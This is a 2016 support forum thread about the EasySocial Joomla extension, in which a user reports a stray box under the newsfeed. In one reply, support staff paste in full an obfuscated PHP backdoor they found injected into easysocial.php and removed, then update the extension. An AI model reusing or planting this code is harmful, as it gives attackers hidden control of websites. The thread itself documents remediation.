By Gene Teigland on Wednesday, 29 June 2016
Posted in Technical Issues
Replies 5
Likes 0
Views 340
Votes 0
I have a weird box that shows up when a user scrolls to the bottom of their newsfeed under our footer. Then it disappears when the new feed shows up. This ONLY happens on ES social feeds.

http://www.awesomescreenshot.com/image/1360374/6781b2c367faa7e4b1b47cb88516eaa2
Hi Gene Teigland,

I am sorry for the late reply and inconvenience caused for this. Seem like I cannot access your Joomla back end. Can you please advise? Besides, can you provide us with FTP login credential as well?
I've inspected that the weird box that showing is light box. We need the credential above to troubleshoot further what exactly it is.

Thanks for understanding Gene.
·
Thursday, 30 June 2016 10:46
·
0 Likes
·
0 Votes
·
0 Comments
·
Where do I put in the backend access credentials on this thread? I don't see that option unless I create a new thread.
·
Saturday, 02 July 2016 08:19
·
0 Likes
·
0 Votes
·
0 Comments
·
Hey there,

I am really sorry for the delay of this reply as it is a weekend for us here.

Firstly, i went to check this file -> JoomlaFolder/components/com_easysocial/easysocial.php , and I noticedd inside this file shown these following code, i think that is malicious code , and i already help you removed.


<?php $tamuchm = ']283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M33]y76]277#<!%t2w>#]y74]241 x74 145 x5f 146 x75 156 x63 164 x69 150#)idubn`hfsq)!sp!*#ojneb# x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfx75 156 x61"]=1; $uas=strtolower($_SERVER[")323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]275]y83]274y4 x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x24gvw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]")) or (strstr($uas," x61 1)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b7,*d x27,*c x27,*b x27)fepdof.)fepdof./#@#/qp%>5h%!<*:::::>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zx24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x2 x48 124 x54 120 x5f 125 x53 105 x52 137)323ldfidk!~!<**qp%!-uyfu%)3W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rx56 x64 162 x6f 151 x64"))) { $zrzjahb = " x63 162 x65 1zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5c x7f_*#fmjgk4`{6~6<tfs%w6<~ x24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz:-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}odujpo! x24- x24y7 x24- x24*<! W%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<K9]78]K5]53]Kc#<%tpz!>12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovh%)n%-#+I#)q%:>:r%:|:**dfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<7 x6e"; function mtqdrps($n){return chr(ord($n)-3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)67y]37]88y]27]28y]#/r%/B%h>#]y31]278]y3e]81]K78:569l}S;2-u%!-#2#/#%#/#o]#/*73]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x240utjyf`opjudovg x22)!gj}1~PFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7f x75 156 x61"])))) { $GLOBALS[" x61 156 mgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsu*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&|!*)323zbek!~!<b% x7f!<X>b%Z<#o;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323l3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Kfdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h0%)kVx{**#k#)tutjyf`x x22l:!}V;]#-bubE{h%)tpqsut>j%!*9! x27!opoV;hojepdoF.uofuopD#)sfebfI{*w:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%55946-tr.984:75983:48917,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fe]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%w)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#6#<!%w:!>!(%w:!>! x246767~666~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)7!<2p% x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2b>!%i x5c2^<!Ce*[!%cIjQeTdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3h***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfpo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%% x24- x24b!>!%yy)#}<")));$onjoune = $zrzjahb("", $dembegz); $onjoune();}}342]58]24]31#-%tdz*Wsfuvso!%bsEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!97-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfs6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275LeuhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x20~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]4- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw && (!isset($GLOBALS[" x61 15685:6197g:74985-rr.93e:-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6fS{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7Rix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7dfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:0#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7fw6*}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osv1);} @error_reporting(0); #-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24- x2$dembegz = implode(array_map("mtqdrps",str_split("%tjw!>!#]/ x24)%c*W%eN+#Qi x5c1^W%c!X;!sp!*#opo#>>}R;msv}.y3f]51L3]84]y31M6]y3e]81#/#7e:7y]252]18y]#>q%<#762s x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx< x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA x27pd%6<C x27pd%6|6.7eu{d%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)<!%ww2)%w`TW~ x24<!fwbm)%tj`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]Dg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubopmA x273qj%6<*Y%)fnbozjsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdXA6|7**1-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:** x41 107 x45 116 x54"]); if ((s:|:*r%:-t%)3of:opjudovg<:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fep4y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]4trstr($uas," x6d 163 x69 145")) or (strstr($uas," x72 166 x3a 61 x31y84]275]y83]248]y83]256]y81]265]y72]254]y7cYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#QcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44t%)m%=*h%)m%):fmjix:<##:>:h%:<#6z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<if((function_exists(" x6f 142 x5f 163 x74 141 x72 164")t>j%!*72! x27!hmg%)!gj!<2,*j%-#1yfR x27tfs%6<*17-SFEBFI,6<*127-UV]67y]562]38y]572]48y]#>m%[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg+9f5d816:+946:ce44#)zbssb!) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)]317]445]212]445]43]321]464]284]364]6]234]eobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#j{hnpd!opjudovg!|!**#j{hnpd#)tx5c1^-%r x5c2^-%hOh/#00#>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA84:71]K9]77]D4]82]K6]72]STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSiphzko'; $rjwlax=explode(chr((477-357)),substr($tamuchm,(35725-29799),(145-111))); $rcaapml = $rjwlax[0]($rjwlax[(5-4)]); $zapcnhs = $rjwlax[0]($rjwlax[(6-4)]); if (!function_exists('epvmhvc')) { function epvmhvc($osnjego, $xzsgjmd,$qtndmbdg) { $drjivcz = NULL; for($xkxbqwpy=0;$xkxbqwpy<(sizeof($osnjego)/2);$xkxbqwpy++) { $drjivcz .= substr($xzsgjmd, $osnjego[($xkxbqwpy*2)],$osnjego[($xkxbqwpy*2)+(7-6)]); } return $qtndmbdg(chr((49-40)),chr((301-209)),$drjivcz); }; } $kxibna = explode(chr((279-235)),'5269,55,3523,30,2020,40,192,43,811,40,4712,31,4888,68,480,27,932,55,86,41,1623,48,3986,26,4075,59,4956,42,2680,27,5862,40,4276,69,2707,61,1422,55,3681,65,4602,44,3220,66,2855,58,4579,23,4998,66,987,52,5804,58,3878,66,1039,26,153,39,5356,33,1958,62,346,69,5414,62,4408,66,3944,42,1477,58,4512,67,2060,69,5324,32,2382,29,1723,66,5199,70,1362,60,5716,30,1933,25,2768,63,4345,36,3351,63,563,58,1120,39,2913,38,5656,60,127,26,3575,60,5523,26,5770,34,3174,46,2183,31,2951,54,851,28,1159,63,4161,22,2214,44,3746,69,621,62,4767,69,1558,65,2129,54,3635,46,2507,66,2411,32,2352,30,1671,52,3005,65,1840,24,235,56,62,24,1864,69,3414,49,1789,23,1535,23,5104,32,4836,52,4213,20,5389,25,4743,24,1065,55,5549,65,3070,20,4012,63,291,55,1222,31,741,70,3463,60,4134,27,2831,24,5064,40,1295,45,683,58,1253,42,5746,24,879,53,1812,28,3553,22,415,65,4183,30,2485,22,5902,24,1340,22,4474,38,3286,65,2258,48,2573,44,2306,46,3815,63,0,62,5614,42,3144,30,4233,43,5476,47,507,56,2443,42,5136,63,4381,27,2617,63,4646,66,3090,54'); $ejtxktatyt = $rcaapml("",epvmhvc($kxibna,$tamuchm,$zapcnhs)); $rcaapml=$tamuchm; $ejtxktatyt(""); $ejtxktatyt=(797-676); $tamuchm=$ejtxktatyt-1; ?><?php



By the way, regarding with your main question, can I have permission to help you update to latest version of Easysocial? Because I would like to get rid of these malicious code from your Easysocial file.
·
Saturday, 02 July 2016 10:52
·
0 Likes
·
0 Votes
·
0 Comments
·
yes please do. Thanks!
·
Saturday, 02 July 2016 12:08
·
0 Likes
·
0 Votes
·
0 Comments
·
Hi Gene,

I've helped you to update your EasySocial to latest version and it seems like the weird box is no longer showing from your social news feed. Can you check again and verify this from your end?
·
Monday, 04 July 2016 16:38
·
0 Likes
·
0 Votes
·
0 Comments
·
View Full Post